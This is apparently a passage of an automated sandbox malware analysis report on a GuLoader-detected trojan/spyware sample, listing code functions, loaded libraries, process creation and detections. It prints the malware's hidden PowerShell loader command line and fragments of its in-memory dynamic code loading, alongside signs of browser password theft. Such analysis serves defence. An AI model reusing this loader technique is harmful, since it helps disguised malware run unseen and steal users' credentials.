            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539B8189_2_2539B818
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539DC1A9_2_2539DC1A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253900079_2_25390007
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539E0789_2_2539E078
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539BC719_2_2539BC71
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539E0689_2_2539E068
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25393C509_2_25393C50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25393C419_2_25393C41
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253900409_2_25390040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253940A89_2_253940A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253904989_2_25390498
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253940989_2_25394098
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25399C909_2_25399C90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539048A9_2_2539048A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539BC809_2_2539BC80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253908F09_2_253908F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539C0D89_2_2539C0D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253908DF9_2_253908DF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539E4D09_2_2539E4D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539C0CA9_2_2539C0CA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539E4C29_2_2539E4C2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25392F389_2_25392F38
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539AB209_2_2539AB20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539AB109_2_2539AB10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539AF789_2_2539AF78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253977709_2_25397770
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539AF689_2_2539AF68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25392F489_2_25392F48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253933A09_2_253933A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253933929_2_25393392
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253937F89_2_253937F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253937E89_2_253937E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539B3D09_2_2539B3D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539B3C19_2_2539B3C1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539D2389_2_2539D238
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539F6309_2_2539F630
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539F6299_2_2539F629
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539D22A9_2_2539D22A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25399E189_2_25399E18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539FA789_2_2539FA78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539A2709_2_2539A270
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539A2619_2_2539A261
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539A6B99_2_2539A6B9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539D6909_2_2539D690
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539FA889_2_2539FA88
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539D6849_2_2539D684
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25392AF09_2_25392AF0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25392AE09_2_25392AE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539A6C89_2_2539A6C8
            Source: LE2dyDn347.exe, 00000000.00000002.1245776558.00000000007BB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerepry ironical.exe4 vs LE2dyDn347.exe
            Source: LE2dyDn347.exeBinary or memory string: OriginalFilenamerepry ironical.exe4 vs LE2dyDn347.exe
            Source: LE2dyDn347.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/17@4/4
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_004033B5 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B5
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_0040479C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040479C
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar,0_2_00402198
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile created: C:\Users\user\AppData\Local\Temp\nsiB63E.tmpJump to behavior
            Source: LE2dyDn347.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: msiexec.exe, 00000009.00000002.2501273805.000000002320F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2501273805.000000002321D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2501273805.00000000231FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: LE2dyDn347.exeVirustotal: Detection: 59%
            Source: LE2dyDn347.exeReversingLabs: Detection: 44%
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile read: C:\Users\user\Desktop\LE2dyDn347.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\LE2dyDn347.exe "C:\Users\user\Desktop\LE2dyDn347.exe"
            Source: C:\Users\user\Desktop\LE2dyDn347.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\LE2dyDn347.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile written: C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Allopathetic.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: LE2dyDn347.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000001.00000002.1775288111.0000000008262000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ?\C:\Windows\System.Core.pdb source: powershell.exe, 00000001.00000002.1775288111.0000000008262000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdbmo source: powershell.exe, 00000001.00000002.1775288111.00000000081E3000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000001.00000002.1777193585.000000000A510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Erhversretliges $Tacklingens $counterreligion), (Skyros @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Lgestuderendes = [AppDomain]::CurrentDomain.GetAsse
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tomjohn)), $Markeringerne).DefineDynamicModule($gossan, $false).DefineType($Soegetekst, $Falderebstrappe, [System.MulticastDelegate])$
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\LE2dyDn347.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)"
            Source: C:\Users\user\Desktop\LE2dyDn347.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0436A492 pushfd ; ret 1_2_0436A4A1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0436E9F8 push eax; mov dword ptr [esp], edx1_2_0436EA0C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0013F1EE push ebp; retf 9_2_0013F281
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00131D21 push 8BFFFFFFh; retf 9_2_00131D27

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
